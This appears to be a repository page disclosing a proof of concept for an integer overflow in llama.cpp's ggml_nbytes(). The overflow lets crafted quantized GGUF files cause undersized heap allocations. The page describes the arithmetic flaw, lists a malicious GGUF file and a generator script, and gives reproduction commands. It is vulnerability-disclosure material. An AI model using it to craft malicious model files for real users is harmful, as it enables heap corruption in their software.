You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

PoC: Integer Overflow in ggml_nbytes() for Quantized GGUF Tensors

Vulnerability

Integer overflow in ggml_nbytes() (ggml/src/ggml.c:1273) and ggml_row_size() (ggml/src/ggml.c:1302) causes drastically undersized heap allocations when loading crafted GGUF files with quantized tensor types.

For quantized types (Q4_0 through Q8_K, blck_size > 1), the computation ne[0] * type_size / blck_size overflows in the intermediate ne[0] * type_size multiplication before the division, returning a tiny value (e.g., 4 bytes instead of 576 PB).

All existing overflow checks in the GGUF parser pass because they validate the final result (nelements/blck_size)*type_size, not the intermediate product.

Files

  • malicious.gguf - Crafted GGUF with Q4_0 tensor, ne[0]=1024819115206086208
  • craft_gguf.py - Script to generate malicious GGUF files (supports Q4_0 through Q8_K)
  • test_load.c - Test loader demonstrating the overflow

Reproduction

# Build llama.cpp with ASan
cmake -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" ..
cmake --build . --target llama-gguf

# Run
./bin/llama-gguf malicious.gguf r

Impact

Heap buffer overflow via undersized allocation. Affects llama-quantize, llama-imatrix, control vectors, and examples/gguf (all code paths using no_alloc=false). Variant of CVE-2026-27940/CVE-2026-33298.

Downloads last month
-
GGUF
Model size
1024819.1T params
Architecture
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support